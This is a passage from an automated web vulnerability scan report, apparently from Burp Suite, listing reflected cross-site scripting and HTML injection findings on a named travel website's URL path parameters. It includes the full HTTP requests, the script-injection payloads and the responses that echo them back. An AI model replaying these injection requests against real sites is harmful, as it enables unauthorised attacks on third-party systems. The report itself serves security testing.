Content-Type: text/html; charset=utf-8
Content-Length: 13812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>e4b2ad84e07=1">loadingAnimation.gif?e0230<a>e4b2ad84e07=1</a>
...[SNIP]...
4.389. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 269d3<a>fe432cfa2bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C269d3<a>fe432cfa2bd/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621574; expires=Tue, 02-Oct-2012 00:59:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>fe432cfa2bd">home83d87%22%3E%3Cscript%3Ealert(1)%3C269d3<a>fe432cfa2bd</a>
...[SNIP]...
4.390. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f32"><script>alert(1)</script>8d4d416ae6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3Cc1f32"><script>alert(1)</script>8d4d416ae6e/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621574; expires=Tue, 02-Oct-2012 00:59:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3Cc1f32"><script>alert(1)</script>8d4d416ae6e/script%3Efb97ed1345c">
...[SNIP]...
4.391. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c59c5<a>0764d9cc01e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345cc59c5<a>0764d9cc01e/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621582; expires=Tue, 02-Oct-2012 00:59:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>0764d9cc01e">script%3Efb97ed1345cc59c5<a>0764d9cc01e</a>
...[SNIP]...
4.392. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 411b4"><script>alert(1)</script>5f460895727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c411b4"><script>alert(1)</script>5f460895727/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621582; expires=Tue, 02-Oct-2012 00:59:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c411b4"><script>alert(1)</script>5f460895727/search">
...[SNIP]...
4.393. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3db33<a>cec1ced26c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search3db33<a>cec1ced26c5/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621591; expires=Tue, 02-Oct-2012 00:59:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>cec1ced26c5">search3db33<a>cec1ced26c5</a>
...[SNIP]...
4.394. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4601"><script>alert(1)</script>6817d4ebd37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/searche4601"><script>alert(1)</script>6817d4ebd37/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621590; expires=Tue, 02-Oct-2012 00:59:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/searche4601"><script>alert(1)</script>6817d4ebd37/images">
...[SNIP]...
4.395. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc38"><script>alert(1)</script>2a0520a8fd3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/imagesdbc38"><script>alert(1)</script>2a0520a8fd3/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621600; expires=Tue, 02-Oct-2012 01:00:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/imagesdbc38"><script>alert(1)</script>2a0520a8fd3/loadingAnimation.gif">
...[SNIP]...
4.396. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7abca<a>2fd76141046 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images7abca<a>2fd76141046/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621601; expires=Tue, 02-Oct-2012 01:00:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>2fd76141046">images7abca<a>2fd76141046</a>
...[SNIP]...
